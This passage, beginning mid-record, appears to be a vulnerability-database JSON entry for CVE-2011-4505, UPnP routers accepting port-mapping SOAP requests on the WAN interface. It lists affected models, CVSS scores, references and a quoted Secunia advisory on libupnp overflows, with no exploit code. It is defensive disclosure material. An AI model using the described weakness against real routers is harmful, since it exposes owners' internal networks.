"vendor": "edimax",
"version": "0"
},
{
"model": "cn-wf514",
"scope": "eq",
"trust": 0.9,
"vendor": "canyon tech",
"version": "2.08"
},
{
"model": "cn-wf512",
"scope": "eq",
"trust": 0.9,
"vendor": "canyon tech",
"version": "1.83"
},
{
"model": "tg585 router",
"scope": "eq",
"trust": 0.9,
"vendor": "thomson",
"version": "0"
},
{
"model": null,
"scope": "eq",
"trust": 0.9,
"vendor": "speedtouch",
"version": "5x60"
},
{
"model": "wl-153",
"scope": "eq",
"trust": 0.9,
"vendor": "sitcom",
"version": "0"
},
{
"model": "wl-111",
"scope": "eq",
"trust": 0.9,
"vendor": "sitcom",
"version": "0"
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "canyon tech",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "edimax computer",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "linksys a division of cisco",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "sitecom",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "sweex",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "technicolor",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "zyxel",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "axis",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "cisco",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "fujitsu",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "huawei",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "linksys",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "nec",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "siemens",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "sony",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "synology",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "ipitomy",
"version": null
},
{
"model": "speedtouch 5x6 router",
"scope": null,
"trust": 0.8,
"vendor": "alcatel lucent",
"version": null
},
{
"model": "speedtouch 5x6 router",
"scope": "lt",
"trust": 0.8,
"vendor": "alcatel lucent",
"version": "6.2.29"
},
{
"model": "",
"scope": null,
"trust": 0.8,
"vendor": "multiple vendors",
"version": null
},
{
"model": "wrt54g beta/2.0",
"scope": "eq",
"trust": 0.6,
"vendor": "linksys",
"version": "4.04.20.6/4.04.0.7/3.03.3.6/3.03.1.3/2.02.4.4/2.02.02.82.00.8"
},
{
"model": "speedtouch 5x6 router",
"scope": "eq",
"trust": 0.6,
"vendor": "alcatel",
"version": "6.2"
},
{
"model": "p-330w",
"scope": "eq",
"trust": 0.3,
"vendor": "zyxel",
"version": "0"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v4.04.20.6"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v4.04.0.7"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v3.03.3.6"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v3.03.1.3"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v2.02.4.4"
},
{
"model": "wrt54g beta",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v2.02.02.8"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v2.02.00.8"
},
{
"model": "tg585 router",
"scope": "ne",
"trust": 0.3,
"vendor": "thomson",
"version": "7.4.3.2"
},
{
"model": null,
"scope": "ne",
"trust": 0.3,
"vendor": "speedtouch",
"version": "5x66.2.29"
},
{
"model": "wl-153",
"scope": "ne",
"trust": 0.3,
"vendor": "sitcom",
"version": "1.39"
},
{
"model": "wrt54g",
"scope": "ne",
"trust": 0.3,
"vendor": "linksys",
"version": "v4.01.0.6"
},
{
"model": "br-6104k",
"scope": "ne",
"trust": 0.3,
"vendor": "edimax",
"version": "3.25"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "CERT/CC",
"id": "VU#922681"
},
{
"db": "CNVD",
"id": "CNVD-2011-5063"
},
{
"db": "BID",
"id": "50810"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003035"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"db": "NVD",
"id": "CVE-2011-4505"
},
{
"db": "CNNVD",
"id": "CNNVD-201111-367"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:alcatel:speedtouch_5x6_router_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "6.2",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:alcatel:speedtouch_5x6_router:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2011-4505"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Daniel Garcia",
"sources": [
{
"db": "BID",
"id": "50810"
}
],
"trust": 0.3
},
"cve": "CVE-2011-4505",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CARNEGIE MELLON",
"availabilityImpact": "COMPLETE",
"availabilityRequirement": "NOT DEFINED",
"baseScore": 9.4,
"collateralDamagePotential": "NOT DEFINED",
"confidentialityImpact": "NONE",
"confidentialityRequirement": "NOT DEFINED",
"enviromentalScore": 8.0,
"exploitability": "PROOF-OF-CONCEPT",
"exploitabilityScore": 10.0,
"id": "VU#357851",
"impactScore": 9.2,
"integrityImpact": "COMPLETE",
"integrityRequirement": "NOT DEFINED",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"remediationLevel": "WORKAROUND",
"reportConfidence": "CONFIRMED",
"severity": "HIGH",
"targetDistribution": "NOT DEFINED",
"trust": 0.8,
"userInterationRequired": null,
"vector_string": "AV:N/AC:L/Au:N/C:N/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 7.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2011-4505",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-52450",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2011-4505",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#357851",
"trust": 0.8,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201111-367",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-52450",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "VULHUB",
"id": "VHN-52450"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003035"
},
{
"db": "NVD",
"id": "CVE-2011-4505"
},
{
"db": "CNNVD",
"id": "CNNVD-201111-367"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The UPnP IGD implementation on SpeedTouch 5x6 devices with firmware before 6.2.29 allows remote attackers to establish arbitrary port mappings by sending a UPnP AddPortMapping action in a SOAP request to the WAN interface, related to an \"external forwarding\" vulnerability. The Portable SDK for UPnP Devices libupnp library contains multiple buffer overflow vulnerabilities. Devices that use libupnp may also accept UPnP queries over the WAN interface, therefore exposing the vulnerabilities to the internet. Universal Plug and Play (UPnP) Multiple compatible routers have vulnerabilities with insufficient access restrictions. Universal Plug and Play (UPnP) is a network protocol that is mostly used for personal computer device discovery and communication with other devices and the Internet. These requests can be used to connect to the internal host or proxy connection of the NAT firewall. Remote unauthenticated attackers can exploit vulnerabilities to scan internal hosts or communicate via the device proxy Internet. \nThe following devices are affected:\nCisco Linksys WRT54G firmware version prior to 4.30.5\nCisco Linksys WRT54GS v1 through v3 firmware versions prior to 4.71.1\nCisco Linksys WRT54GS v4 firmware versions prior to 1.06.1\nCisco Linksys WRT54GX firmware 2.00.05\nEdimax BR-6104K prior to 3.25\nEdimax 6114Wg\nCanyon-Tech CN-WF512 firmware version 1.83\nCanyon-Tech CN-WF514 firmware version 2.08\nSitecom WL-153 prior to firmware 1.39\nSitecom WL-111\nSweex LB000021 firmware version 3.15\nZyXEL P-330W\nSpeedTouch 5x6 firmware versions prior to 6.2.29\nThomson TG585 firmware versions prior to 7.4.3.2. Speedtouch is a wireless Internet router for the home. This vulnerability is related to the \\\"external forwarding\\\" vulnerability. ----------------------------------------------------------------------\n\nThe final version of the CSI 6.0 has been released. 
\nFind out why this is not just another Patch Management solution: http://secunia.com/blog/325/\n\n----------------------------------------------------------------------\n\nTITLE:\nSiemens OZW / OZS Multiple Products libupnp Buffer Overflow\nVulnerabilities\n\nSECUNIA ADVISORY ID:\nSA52035\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/52035/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=52035\n\nRELEASE DATE:\n2013-01-31\n\nDISCUSS ADVISORY:\nhttp://secunia.com/advisories/52035/#comments\n\nAVAILABLE ON SITE AND IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/52035/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=52035\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nMultiple vulnerabilities have been reported in multiple Siemens OZW\nand OZS products, which can be exploited by malicious people to\ncompromise a vulnerable device. \n\n1) Multiple vulnerabilities are caused due to a bundled version of\nlibupnp. \n\nFor more information:\nSA51949\n\n2) Multiple boundary errors within the \"unique_service_name()\"\nfunction (ssdp/ssdp_ctrlpt.c) in libupnp when handling SSDP requests\ncan be exploited to cause stack-based buffer overflows. The vendor is planning\nto provide fixes with upcoming firmware updates. 
\n\nPROVIDED AND/OR DISCOVERED BY:\n2) Rapid7\n\nORIGINAL ADVISORY:\nSiemens SSA-963338:\nhttp://www.siemens.com/corporate-technology/pool/de/forschungsfelder/siemens_security_advisory_ssa-963338.pdf\n\nRapid7:\nhttps://community.rapid7.com/docs/DOC-2150\nhttps://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play\n\nOTHER REFERENCES:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED SOLUTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n. 
This library is used in several vendor network\ndevices in addition to media streaming and file sharing applications. \nThese vulnerabilities were disclosed on January 29th, 2013 in a CERT\nVulnerability Note, VU#922681, which can be viewed at:\n\nhttp://www.kb.cert.org/vuls/id/922681\n\nCisco is currently evaluating products for possible exposure to these\nvulnerabilities. This advisory is available at the following link:\n\nhttp://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130129-upnp\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.11 (GNU/Linux)\n\niF4EAREIAAYFAlEIJZ8ACgkQUddfH3/BbTrUagD9FnKSVkc2iIfGs+7c8SVPT26+\nga5hYEz9UMUnitcqnbcBAIKe6KnkR6he2zbstVtbTKtqSjE7pfVb3lTKVZSeAkM5\n=6sTu\n-----END PGP SIGNATURE-----\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2011-4505"
},
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "CERT/CC",
"id": "VU#922681"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003035"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"db": "CNVD",
"id": "CNVD-2011-5063"
},
{
"db": "BID",
"id": "50810"
},
{
"db": "VULHUB",
"id": "VHN-52450"
},
{
"db": "PACKETSTORM",
"id": "119949"
},
{
"db": "PACKETSTORM",
"id": "119896"
}
],
"trust": 4.86
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#357851",
"trust": 5.8
},
{
"db": "NVD",
"id": "CVE-2011-4505",
"trust": 3.4
},
{
"db": "SIEMENS",
"id": "SSA-963338",
"trust": 0.9
},
{
"db": "CERT/CC",
"id": "VU#922681",
"trust": 0.9
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003035",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201111-367",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2011-5063",
"trust": 0.6
},
{
"db": "NSFOCUS",
"id": "18224",
"trust": 0.6
},
{
"db": "BID",
"id": "50810",
"trust": 0.3
},
{
"db": "SECUNIA",
"id": "52035",
"trust": 0.2
},
{
"db": "VULHUB",
"id": "VHN-52450",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "119949",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "119896",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "CERT/CC",
"id": "VU#922681"
},
{
"db": "CNVD",
"id": "CNVD-2011-5063"
},
{
"db": "VULHUB",
"id": "VHN-52450"
},
{
"db": "BID",
"id": "50810"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003035"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"db": "PACKETSTORM",
"id": "119949"
},
{
"db": "PACKETSTORM",
"id": "119896"
},
{
"db": "NVD",
"id": "CVE-2011-4505"
},
{
"db": "CNNVD",
"id": "CNNVD-201111-367"
}
]
},
"id": "VAR-201111-0161",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-5063"
},
{
"db": "VULHUB",
"id": "VHN-52450"
}
],
"trust": 1.4788191
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-5063"
}
]
},
"last_update_date": "2023-12-18T12:09:29.730000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.alcatel-lucent.com"
},
{
"title": "Patch for Multiple Routers UPnP WAN Interface Remote Unauthorized Access Vulnerability (CNVD-2011-5063)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/6021"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-5063"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003035"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-16",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-52450"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003035"
},
{
"db": "NVD",
"id": "CVE-2011-4505"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 4.4,
"url": "http://www.kb.cert.org/vuls/id/357851"
},
{
"trust": 2.5,
"url": "http://toor.do/defcon-19-garcia-upnp-mapping-wp.pdf"
},
{
"trust": 1.6,
"url": "http://homekb.cisco.com/cisco2/ukp.aspx?vw=1\u0026articleid=28341"
},
{
"trust": 1.6,
"url": "http://jvn.jp/cert/jvnvu357851"
},
{
"trust": 1.1,
"url": "http://www.upnp-hacks.org/devices.html"
},
{
"trust": 0.9,
"url": "https://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play"
},
{
"trust": 0.9,
"url": "https://community.rapid7.com/docs/doc-2150"
},
{
"trust": 0.9,
"url": "http://www.siemens.com/corporate-technology/pool/de/forschungsfelder/siemens_security_advisory_ssa-963338.pdf"
},
{
"trust": 0.8,
"url": "http://toor.do/upnp.html"
},
{
"trust": 0.8,
"url": "http://www.h-online.com/security/news/item/upnp-enabled-routers-allow-attacks-on-lans-1329727.html"
},
{
"trust": 0.8,
"url": "http://pupnp.sourceforge.net/"
},
{
"trust": 0.8,
"url": "https://community.rapid7.com/servlet/jiveservlet/download/2150-1-16596/securityflawsupnp.pdf"
},
{
"trust": 0.8,
"url": "http://www.rapid7.com/resources/free-security-software-downloads/universal-plug-and-play-jan-2013.jsp"
},
{
"trust": 0.8,
"url": "http://opentools.homeip.net/dev-tools-for-upnp"
},
{
"trust": 0.8,
"url": "http://upnp.sourceforge.net/"
},
{
"trust": 0.8,
"url": "http://www.dlink.com/us/en/technology/upnp"
},
{
"trust": 0.8,
"url": "http://jpn.nec.com/security-info/secinfo/nv13-003.html"
},
{
"trust": 0.8,
"url": "http://www.ipitomy.com/index.php/mi-security-notice-ip001"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-4505"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2011-4505"
},
{
"trust": 0.6,
"url": "http://www.kb.cert.org/vuls/id/357851http"
},
{
"trust": 0.6,
"url": "http://www.nsfocus.net/vulndb/18224"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/52035/#comments"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_intelligence/"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/about_secunia_advisories/"
},
{
"trust": 0.1,
"url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=52035"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/52035/"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/personal/"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://secunia.com/blog/325/"
},
{
"trust": 0.1,
"url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20130129-upnp"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/922681"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "CERT/CC",
"id": "VU#922681"
},
{
"db": "CNVD",
"id": "CNVD-2011-5063"
},
{
"db": "VULHUB",
"id": "VHN-52450"
},
{
"db": "BID",
"id": "50810"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003035"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"db": "PACKETSTORM",
"id": "119949"
},
{
"db": "PACKETSTORM",
"id": "119896"
},
{
"db": "NVD",
"id": "CVE-2011-4505"
},
{
"db": "CNNVD",
"id": "CNNVD-201111-367"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "CERT/CC",
"id": "VU#922681"
},
{
"db": "CNVD",
"id": "CNVD-2011-5063"
},
{
"db": "VULHUB",
"id": "VHN-52450"
},
{
"db": "BID",
"id": "50810"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003035"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"db": "PACKETSTORM",
"id": "119949"
},
{
"db": "PACKETSTORM",
"id": "119896"
},
{
"db": "NVD",
"id": "CVE-2011-4505"
},
{
"db": "CNNVD",
"id": "CNNVD-201111-367"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2011-10-05T00:00:00",
"db": "CERT/CC",
"id": "VU#357851"
},
{
"date": "2013-01-29T00:00:00",
"db": "CERT/CC",
"id": "VU#922681"
},
{
"date": "2011-11-25T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-5063"
},
{
"date": "2011-11-22T00:00:00",
"db": "VULHUB",
"id": "VHN-52450"
},
{
"date": "2011-11-24T00:00:00",
"db": "BID",
"id": "50810"
},
{
"date": "2011-11-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-003035"
},
{
"date": "2011-10-12T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"date": "2013-01-31T07:26:31",
"db": "PACKETSTORM",
"id": "119949"
},
{
"date": "2013-01-30T02:46:44",
"db": "PACKETSTORM",
"id": "119896"
},
{
"date": "2011-11-22T11:55:06.090000",
"db": "NVD",
"id": "CVE-2011-4505"
},
{
"date": "2011-11-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201111-367"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2012-11-30T00:00:00",
"db": "CERT/CC",
"id": "VU#357851"
},
{
"date": "2014-07-30T00:00:00",
"db": "CERT/CC",
"id": "VU#922681"
},
{
"date": "2011-11-25T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-5063"
},
{
"date": "2012-03-08T00:00:00",
"db": "VULHUB",
"id": "VHN-52450"
},
{
"date": "2015-03-19T08:33:00",
"db": "BID",
"id": "50810"
},
{
"date": "2011-11-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-003035"
},
{
"date": "2011-10-12T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"date": "2012-03-08T05:00:00",
"db": "NVD",
"id": "CVE-2011-4505"
},
{
"date": "2011-11-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201111-367"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201111-367"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "UPnP requests accepted over router WAN interfaces",
"sources": [
{
"db": "CERT/CC",
"id": "VU#357851"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "configuration error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201111-367"
}
],
"trust": 0.6
}
}
VAR-201111-0159
Vulnerability from variot - Updated: 2023-12-18 12:09
The UPnP IGD implementation in Broadcom Linux on the Sitecom WL-111 allows remote attackers to establish arbitrary port mappings by sending a UPnP AddPortMapping action in a SOAP request to the WAN interface, related to an "external forwarding" vulnerability. The Portable SDK for UPnP Devices libupnp library contains multiple buffer overflow vulnerabilities. Devices that use libupnp may also accept UPnP queries over the WAN interface, therefore exposing the vulnerabilities to the internet. Multiple Universal Plug and Play (UPnP) compatible routers have insufficient access restrictions. A vulnerability exists in the UPnP IGD implementation of Broadcom Linux for Sitecom WL-111. This vulnerability is related to the "external forwarding" vulnerability. An attacker can exploit this issue to gain unauthorized access to scan internal hosts or proxy Internet traffic through an affected device. (This description is aggregated from several advisories; the WAN-side port-mapping issue and the libupnp buffer overflows, which the quoted text below attributes to CERT VU#922681, are separate problems.)
The following devices are affected:
Cisco Linksys WRT54G firmware version prior to 4.30.5
Cisco Linksys WRT54GS v1 through v3 firmware versions prior to 4.71.1
Cisco Linksys WRT54GS v4 firmware versions prior to 1.06.1
Cisco Linksys WRT54GX firmware 2.00.05
Edimax BR-6104K prior to 3.25
Edimax 6114Wg
Canyon-Tech CN-WF512 firmware version 1.83
Canyon-Tech CN-WF514 firmware version 2.08
Sitecom WL-153 prior to firmware 1.39
Sitecom WL-111
Sweex LB000021 firmware version 3.15
